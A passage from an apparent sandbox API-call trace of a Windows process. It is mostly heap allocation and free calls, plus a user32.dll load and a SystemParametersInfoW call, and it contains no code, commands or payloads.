RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0295.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0295.496] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0295.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0295.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0295.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0295.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0295.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0295.498] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0295.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0295.498] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0295.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0295.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0295.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0295.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0295.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0295.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0295.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0295.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0295.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0295.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0295.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0295.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0295.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0295.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0295.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0295.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0295.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0295.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0295.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.505] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0295.505] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.506] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0295.506] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.506] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0295.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0295.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0295.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0295.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0295.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0295.507] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0295.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0295.507] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0295.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.507] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0295.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0295.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.508] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0295.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0295.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0295.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0295.508] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0295.508] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0295.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0295.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0295.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0295.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0295.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0295.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0295.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0295.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0295.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0295.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0295.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0295.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0295.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0295.696] FreeLibrary (hLibModule=0x74f40000) returned 1 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0295.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0295.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0295.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0295.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0295.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0295.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0295.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0295.710] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0295.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0295.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0295.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0295.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0295.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0295.711] HeapFree 